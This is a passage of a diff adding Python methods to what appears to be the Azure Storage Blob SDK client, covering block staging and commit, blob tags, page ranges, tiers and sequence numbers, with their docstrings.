object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :rtype: None + """ + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + if standard_blob_tier is None: + raise ValueError("A StandardBlobTier must be specified") + if self.snapshot and kwargs.get('version_id'): + raise ValueError("Snapshot and version_id cannot be set at the same time") + try: + self._client.blob.set_tier( + tier=standard_blob_tier, + snapshot=self.snapshot, + timeout=kwargs.pop('timeout', None), + modified_access_conditions=mod_conditions, + lease_access_conditions=access_conditions, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + + def _stage_block_options( + self, block_id, # type: str + data, # type: Union[Iterable[AnyStr], IO[AnyStr]] + length=None, # type: Optional[int] + **kwargs + ): + # type: (...) -> Dict[str, Any] + if self.require_encryption or (self.key_encryption_key is not None): + raise ValueError(_ERROR_UNSUPPORTED_METHOD_FOR_ENCRYPTION) + block_id = encode_base64(str(block_id)) + if isinstance(data, six.text_type): + data = data.encode(kwargs.pop('encoding', 'UTF-8')) # type: ignore + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + if length is None: + length = get_length(data) + if length is None: + length, data = read_length(data) + if isinstance(data, bytes): + data = data[:length] + + validate_content = kwargs.pop('validate_content', False) + cpk_scope_info = get_cpk_scope_info(kwargs) + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + + options = { + 'block_id': block_id, + 'content_length': length, + 'body': data, + 'transactional_content_md5': None, + 'timeout': kwargs.pop('timeout', None), + 'lease_access_conditions': access_conditions, + 'validate_content': validate_content, + 'cpk_scope_info': cpk_scope_info, + 'cpk_info': cpk_info, + 'cls': return_response_headers, + } + options.update(kwargs) + return options + + @distributed_trace + def stage_block( + self, block_id, # type: str + data, # type: Union[Iterable[AnyStr], IO[AnyStr]] + length=None, # type: Optional[int] + **kwargs + ): + # type: (...) -> Dict[str, Any] + """Creates a new block to be committed as part of a blob. + + :param str block_id: A string value that identifies the block. + The string should be less than or equal to 64 bytes in size. + For a given blob, the block_id must be the same size for each block. + :param data: The blob data. + :param int length: Size of the block. + :keyword bool validate_content: + If true, calculates an MD5 hash for each chunk of the blob. The storage + service checks the hash of the content that has arrived with the hash + that was sent. This is primarily valuable for detecting bitflips on + the wire if using http instead of https, as https (the default), will + already validate. Note that this MD5 hash is not stored with the + blob. Also note that if enabled, the memory-efficient upload algorithm + will not be used because computing the MD5 hash requires buffering + entire blocks, and doing so defeats the purpose of the memory-efficient algorithm. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword str encoding: + Defaults to UTF-8. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob property dict. + :rtype: dict[str, Any] + """ + options = self._stage_block_options( + block_id, + data, + length=length, + **kwargs) + try: + return self._client.block_blob.stage_block(**options) + except HttpResponseError as error: + process_storage_error(error) + + def _stage_block_from_url_options( + self, block_id, # type: str + source_url, # type: str + source_offset=None, # type: Optional[int] + source_length=None, # type: Optional[int] + source_content_md5=None, # type: Optional[Union[bytes, bytearray]] + **kwargs + ): + # type: (...) -> Dict[str, Any] + source_authorization = kwargs.pop('source_authorization', None) + if source_length is not None and source_offset is None: + raise ValueError("Source offset value must not be None if length is set.") + if source_length is not None: + source_length = source_offset + source_length - 1 + block_id = encode_base64(str(block_id)) + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + range_header = None + if source_offset is not None: + range_header, _ = validate_and_format_range_headers(source_offset, source_length) + + cpk_scope_info = get_cpk_scope_info(kwargs) + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + options = { + 'copy_source_authorization': source_authorization, + 'block_id': block_id, + 'content_length': 0, + 'source_url': source_url, + 'source_range': range_header, + 'source_content_md5': bytearray(source_content_md5) if source_content_md5 else None, + 'timeout': kwargs.pop('timeout', None), + 'lease_access_conditions': access_conditions, + 'cpk_scope_info': cpk_scope_info, + 'cpk_info': cpk_info, + 'cls': return_response_headers, + } + options.update(kwargs) + return options + + @distributed_trace + def stage_block_from_url( + self, block_id, # type: Union[str, int] + source_url, # type: str + source_offset=None, # type: Optional[int] + source_length=None, # type: Optional[int] + source_content_md5=None, # type: Optional[Union[bytes, bytearray]] + **kwargs + ): + # type: (...) -> Dict[str, Any] + """Creates a new block to be committed as part of a blob where + the contents are read from a URL. + + :param str block_id: A string value that identifies the block. + The string should be less than or equal to 64 bytes in size. + For a given blob, the block_id must be the same size for each block. + :param str source_url: The URL. + :param int source_offset: + Start of byte range to use for the block. + Must be set if source length is provided. + :param int source_length: The size of the block in bytes. + :param bytearray source_content_md5: + Specify the md5 calculated for the range of + bytes that must be read from the copy source. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :keyword str source_authorization: + Authenticate as a service principal using a client secret to access a source blob. Ensure "bearer " is + the prefix of the source_authorization string. + :returns: Blob property dict. + :rtype: dict[str, Any] + """ + options = self._stage_block_from_url_options( + block_id, + source_url=self._encode_source_url(source_url), + source_offset=source_offset, + source_length=source_length, + source_content_md5=source_content_md5, + **kwargs) + try: + return self._client.block_blob.stage_block_from_url(**options) + except HttpResponseError as error: + process_storage_error(error) + + def _get_block_list_result(self, blocks): + # type: (BlockList) -> Tuple[List[BlobBlock], List[BlobBlock]] + committed = [] # type: List + uncommitted = [] # type: List + if blocks.committed_blocks: + committed = [BlobBlock._from_generated(b) for b in blocks.committed_blocks] # pylint: disable=protected-access + if blocks.uncommitted_blocks: + uncommitted = [BlobBlock._from_generated(b) for b in blocks.uncommitted_blocks] # pylint: disable=protected-access + return committed, uncommitted + + @distributed_trace + def get_block_list(self, block_list_type="committed", **kwargs): + # type: (Optional[str], **Any) -> Tuple[List[BlobBlock], List[BlobBlock]] + """The Get Block List operation retrieves the list of blocks that have + been uploaded as part of a block blob. + + :param str block_list_type: + Specifies whether to return the list of committed + blocks, the list of uncommitted blocks, or both lists together. + Possible values include: 'committed', 'uncommitted', 'all' + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on destination blob with a matching value. + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: A tuple of two lists - committed and uncommitted blocks + :rtype: tuple(list(~azure.storage.blob.BlobBlock), list(~azure.storage.blob.BlobBlock)) + """ + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + try: + blocks = self._client.block_blob.get_block_list( + list_type=block_list_type, + snapshot=self.snapshot, + timeout=kwargs.pop('timeout', None), + lease_access_conditions=access_conditions, + modified_access_conditions=mod_conditions, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + return self._get_block_list_result(blocks) + + def _commit_block_list_options( # type: ignore + self, block_list, # type: List[BlobBlock] + content_settings=None, # type: Optional[ContentSettings] + metadata=None, # type: Optional[Dict[str, str]] + **kwargs + ): + # type: (...) -> Dict[str, Any] + if self.require_encryption or (self.key_encryption_key is not None): + raise ValueError(_ERROR_UNSUPPORTED_METHOD_FOR_ENCRYPTION) + block_lookup = BlockLookupList(committed=[], uncommitted=[], latest=[]) + for block in block_list: + try: + if block.state.value == 'committed': + block_lookup.committed.append(encode_base64(str(block.id))) + elif block.state.value == 'uncommitted': + block_lookup.uncommitted.append(encode_base64(str(block.id))) + else: + block_lookup.latest.append(encode_base64(str(block.id))) + except AttributeError: + block_lookup.latest.append(encode_base64(str(block))) + headers = kwargs.pop('headers', {}) + headers.update(add_metadata_headers(metadata)) + blob_headers = None + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + if content_settings: + blob_headers = BlobHTTPHeaders( + blob_cache_control=content_settings.cache_control, + blob_content_type=content_settings.content_type, + blob_content_md5=content_settings.content_md5, + blob_content_encoding=content_settings.content_encoding, + blob_content_language=content_settings.content_language, + blob_content_disposition=content_settings.content_disposition + ) + + validate_content = kwargs.pop('validate_content', False) + cpk_scope_info = get_cpk_scope_info(kwargs) + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + + immutability_policy = kwargs.pop('immutability_policy', None) + if immutability_policy: + kwargs['immutability_policy_expiry'] = immutability_policy.expiry_time + kwargs['immutability_policy_mode'] = immutability_policy.policy_mode + + tier = kwargs.pop('standard_blob_tier', None) + blob_tags_string = serialize_blob_tags_header(kwargs.pop('tags', None)) + + options = { + 'blocks': block_lookup, + 'blob_http_headers': blob_headers, + 'lease_access_conditions': access_conditions, + 'timeout': kwargs.pop('timeout', None), + 'modified_access_conditions': mod_conditions, + 'cls': return_response_headers, + 'validate_content': validate_content, + 'cpk_scope_info': cpk_scope_info, + 'cpk_info': cpk_info, + 'tier': tier.value if tier else None, + 'blob_tags_string': blob_tags_string, + 'headers': headers + } + options.update(kwargs) + return options + + @distributed_trace + def commit_block_list( # type: ignore + self, block_list, # type: List[BlobBlock] + content_settings=None, # type: Optional[ContentSettings] + metadata=None, # type: Optional[Dict[str, str]] + **kwargs + ): + # type: (...) -> Dict[str, Union[str, datetime]] + """The Commit Block List operation writes a blob by specifying the list of + block IDs that make up the blob. + + :param list block_list: + List of Blockblobs. + :param ~azure.storage.blob.ContentSettings content_settings: + ContentSettings object used to set blob properties. Used to set content type, encoding, + language, disposition, md5, and cache control. + :param metadata: + Name-value pairs associated with the blob as metadata. + :type metadata: dict[str, str] + :keyword tags: + Name-value pairs associated with the blob as tag. Tags are case-sensitive. + The tag set may contain at most 10 tags. Tag keys must be between 1 and 128 characters, + and tag values must be between 0 and 256 characters. + Valid tag key and value characters include: lowercase and uppercase letters, digits (0-9), + space (` `), plus (+), minus (-), period (.), solidus (/), colon (:), equals (=), underscore (_) + + .. versionadded:: 12.4.0 + + :paramtype tags: dict(str, str) + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~azure.storage.blob.ImmutabilityPolicy immutability_policy: + Specifies the immutability policy of a blob, blob snapshot or blob version. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword bool legal_hold: + Specified if a legal hold should be set on the blob. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword bool validate_content: + If true, calculates an MD5 hash of the page content. The storage + service checks the hash of the content that has arrived + with the hash that was sent. This is primarily valuable for detecting + bitflips on the wire if using http instead of https, as https (the default), + will already validate. Note that this MD5 hash is not stored with the + blob. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on destination blob with a matching value. + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.StandardBlobTier standard_blob_tier: + A standard blob tier value to set the blob to. For this version of the library, + this is only applicable to block blobs on standard storage accounts. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified). + :rtype: dict(str, Any) + """ + options = self._commit_block_list_options( + block_list, + content_settings=content_settings, + metadata=metadata, + **kwargs) + try: + return self._client.block_blob.commit_block_list(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def set_premium_page_blob_tier(self, premium_page_blob_tier, **kwargs): + # type: (Union[str, PremiumPageBlobTier], **Any) -> None + """Sets the page blob tiers on the blob. This API is only supported for page blobs on premium accounts. + + :param premium_page_blob_tier: + A page blob tier value to set the blob to. The tier correlates to the size of the + blob and number of allowed IOPS. This is only applicable to page blobs on + premium storage accounts. + :type premium_page_blob_tier: ~azure.storage.blob.PremiumPageBlobTier + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. This method may make + multiple calls to the Azure service and the timeout will apply to + each call individually. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :rtype: None + """ + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + if premium_page_blob_tier is None: + raise ValueError("A PremiumPageBlobTier must be specified") + try: + self._client.blob.set_tier( + tier=premium_page_blob_tier, + timeout=kwargs.pop('timeout', None), + lease_access_conditions=access_conditions, + modified_access_conditions=mod_conditions, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + + def _set_blob_tags_options(self, tags=None, **kwargs): + # type: (Optional[Dict[str, str]], **Any) -> Dict[str, Any] + tags = serialize_blob_tags(tags) + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + + options = { + 'tags': tags, + 'lease_access_conditions': access_conditions, + 'modified_access_conditions': mod_conditions, + 'cls': return_response_headers} + options.update(kwargs) + return options + + @distributed_trace + def set_blob_tags(self, tags=None, **kwargs): + # type: (Optional[Dict[str, str]], **Any) -> Dict[str, Any] + """The Set Tags operation enables users to set tags on a blob or specific blob version, but not snapshot. + Each call to this operation replaces all existing tags attached to the blob. To remove all + tags from the blob, call this operation with no tags set. + + .. versionadded:: 12.4.0 + This operation was introduced in API version '2019-12-12'. + + :param tags: + Name-value pairs associated with the blob as tag. Tags are case-sensitive. + The tag set may contain at most 10 tags. Tag keys must be between 1 and 128 characters, + and tag values must be between 0 and 256 characters. + Valid tag key and value characters include: lowercase and uppercase letters, digits (0-9), + space (` `), plus (+), minus (-), period (.), solidus (/), colon (:), equals (=), underscore (_) + :type tags: dict(str, str) + :keyword str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to add tags to. + :keyword bool validate_content: + If true, calculates an MD5 hash of the tags content. The storage + service checks the hash of the content that has arrived + with the hash that was sent. This is primarily valuable for detecting + bitflips on the wire if using http instead of https, as https (the default), + will already validate. Note that this MD5 hash is not stored with the + blob. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on destination blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified) + :rtype: Dict[str, Any] + """ + options = self._set_blob_tags_options(tags=tags, **kwargs) + try: + return self._client.blob.set_tags(**options) + except HttpResponseError as error: + process_storage_error(error) + + def _get_blob_tags_options(self, **kwargs): + # type: (**Any) -> Dict[str, str] + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + + options = { + 'version_id': kwargs.pop('version_id', None), + 'snapshot': self.snapshot, + 'lease_access_conditions': access_conditions, + 'modified_access_conditions': mod_conditions, + 'timeout': kwargs.pop('timeout', None), + 'cls': return_headers_and_deserialized} + return options + + @distributed_trace + def get_blob_tags(self, **kwargs): + # type: (**Any) -> Dict[str, str] + """The Get Tags operation enables users to get tags on a blob or specific blob version, or snapshot. + + .. versionadded:: 12.4.0 + This operation was introduced in API version '2019-12-12'. + + :keyword str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to add tags to. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on destination blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Key value pairs of blob tags. + :rtype: Dict[str, str] + """ + options = self._get_blob_tags_options(**kwargs) + try: + _, tags = self._client.blob.get_tags(**options) + return parse_tags(tags) # pylint: disable=protected-access + except HttpResponseError as error: + process_storage_error(error) + + def _get_page_ranges_options( # type: ignore + self, offset=None, # type: Optional[int] + length=None, # type: Optional[int] + previous_snapshot_diff=None, # type: Optional[Union[str, Dict[str, Any]]] + **kwargs + ): + # type: (...) -> Dict[str, Any] + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + if length is not None and offset is None: + raise ValueError("Offset value must not be None if length is set.") + if length is not None: + length = offset + length - 1 # Reformat to an inclusive range index + page_range, _ = validate_and_format_range_headers( + offset, length, start_range_required=False, end_range_required=False, align_to_page=True + ) + options = { + 'snapshot': self.snapshot, + 'lease_access_conditions': access_conditions, + 'modified_access_conditions': mod_conditions, + 'timeout': kwargs.pop('timeout', None), + 'range': page_range} + if previous_snapshot_diff: + try: + options['prevsnapshot'] = previous_snapshot_diff.snapshot # type: ignore + except AttributeError: + try: + options['prevsnapshot'] = previous_snapshot_diff['snapshot'] # type: ignore + except TypeError: + options['prevsnapshot'] = previous_snapshot_diff + options.update(kwargs) + return options + + @distributed_trace + def get_page_ranges( # type: ignore + self, offset=None, # type: Optional[int] + length=None, # type: Optional[int] + previous_snapshot_diff=None, # type: Optional[Union[str, Dict[str, Any]]] + **kwargs + ): + # type: (...) -> Tuple[List[Dict[str, int]], List[Dict[str, int]]] + """DEPRECATED: Returns the list of valid page ranges for a Page Blob or snapshot + of a page blob. + + :param int offset: + Start of byte range to use for getting valid page ranges. + If no length is given, all bytes after the offset will be searched. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :param int length: + Number of bytes to use for getting valid page ranges. + If length is given, offset must be provided. + This range will return valid page ranges from the offset start up to + the specified length. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :param str previous_snapshot_diff: + The snapshot diff parameter that contains an opaque DateTime value that + specifies a previous blob snapshot to be compared + against a more recent snapshot or the current blob. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: + A tuple of two lists of page ranges as dictionaries with 'start' and 'end' keys. + The first element are filled page ranges, the 2nd element is cleared page ranges. + :rtype: tuple(list(dict(str, str), list(dict(str, str)) + """ + warnings.warn( + "get_page_ranges is deprecated, use list_page_ranges instead", + DeprecationWarning + ) + + options = self._get_page_ranges_options( + offset=offset, + length=length, + previous_snapshot_diff=previous_snapshot_diff, + **kwargs) + try: + if previous_snapshot_diff: + ranges = self._client.page_blob.get_page_ranges_diff(**options) + else: + ranges = self._client.page_blob.get_page_ranges(**options) + except HttpResponseError as error: + process_storage_error(error) + return get_page_ranges_result(ranges) + + @distributed_trace + def list_page_ranges( + self, + *, + offset: Optional[int] = None, + length: Optional[int] = None, + previous_snapshot: Optional[Union[str, Dict[str, Any]]] = None, + **kwargs: Any + ) -> ItemPaged[PageRange]: + """Returns the list of valid page ranges for a Page Blob or snapshot + of a page blob. If `previous_snapshot` is specified, the result will be + a diff of changes between the target blob and the previous snapshot. + + :keyword int offset: + Start of byte range to use for getting valid page ranges. + If no length is given, all bytes after the offset will be searched. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :keyword int length: + Number of bytes to use for getting valid page ranges. + If length is given, offset must be provided. + This range will return valid page ranges from the offset start up to + the specified length. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :keyword previous_snapshot: + A snapshot value that specifies that the response will contain only pages that were changed + between target blob and previous snapshot. Changed pages include both updated and cleared + pages. The target blob may be a snapshot, as long as the snapshot specified by `previous_snapshot` + is the older of the two. + :paramtype previous_snapshot: str or Dict[str, Any] + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int results_per_page: + The maximum number of page ranges to retrieve per API call. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: An iterable (auto-paging) of PageRange. + :rtype: ~azure.core.paging.ItemPaged[~azure.storage.blob.PageRange] + """ + results_per_page = kwargs.pop('results_per_page', None) + options = self._get_page_ranges_options( + offset=offset, + length=length, + previous_snapshot_diff=previous_snapshot, + **kwargs) + + if previous_snapshot: + command = partial( + self._client.page_blob.get_page_ranges_diff, + **options) + else: + command = partial( + self._client.page_blob.get_page_ranges, + **options) + return ItemPaged( + command, results_per_page=results_per_page, + page_iterator_class=PageRangePaged) + + @distributed_trace + def get_page_range_diff_for_managed_disk( + self, previous_snapshot_url, # type: str + offset=None, # type: Optional[int] + length=None, # type: Optional[int] + **kwargs + ): + # type: (...) -> Tuple[List[Dict[str, int]], List[Dict[str, int]]] + """Returns the list of valid page ranges for a managed disk or snapshot. + + .. note:: + This operation is only available for managed disk accounts. + + .. versionadded:: 12.2.0 + This operation was introduced in API version '2019-07-07'. + + :param previous_snapshot_url: + Specifies the URL of a previous snapshot of the managed disk. + The response will only contain pages that were changed between the target blob and + its previous snapshot. + :param int offset: + Start of byte range to use for getting valid page ranges. + If no length is given, all bytes after the offset will be searched. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :param int length: + Number of bytes to use for getting valid page ranges. + If length is given, offset must be provided. + This range will return valid page ranges from the offset start up to + the specified length. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: + A tuple of two lists of page ranges as dictionaries with 'start' and 'end' keys. + The first element are filled page ranges, the 2nd element is cleared page ranges. + :rtype: tuple(list(dict(str, str), list(dict(str, str)) + """ + options = self._get_page_ranges_options( + offset=offset, + length=length, + prev_snapshot_url=previous_snapshot_url, + **kwargs) + try: + ranges = self._client.page_blob.get_page_ranges_diff(**options) + except HttpResponseError as error: + process_storage_error(error) + return get_page_ranges_result(ranges) + + def _set_sequence_number_options(self, sequence_number_action, sequence_number=None, **kwargs): + # type: (Union[str, SequenceNumberAction], Optional[str], **Any) -> Dict[str, Any] + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + if sequence_number_action is None: + raise ValueError("A sequence number action must be specified") + options = { + 'sequence_number_action': sequence_number_action, + 'timeout': kwargs.pop('timeout', None), + 'blob_sequence_number': sequence_number, + 'lease_access_conditions': access_conditions, + 'modified_access_conditions': mod_conditions, + 'cls': return_response_headers} + options.update(kwargs) + return options + + @distributed_trace + def set_sequence_number(self, sequence_number_action, sequence_number=None, **kwargs): + # type: (Union[str, SequenceNumberAction], Optional[str], **Any) -> Dict[str, Union[str, datetime]] + """Sets the blob sequence number. + + :param str sequence_number_action: + This property indicates how the service should modify the blob's sequence + number. See :class:`~azure.storage.blob.SequenceNumberAction` for more information. + :param str sequence_number: + This property sets the blob's sequence number. The sequence number is a + user-controlled property that you can use to track requests and manage + concurrency issues. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified). + :rtype: dict(str, Any) + """ + options = self._set_sequence_number_options( + sequence_number_action, sequence_number=sequence_number, **kwargs) + try: + return 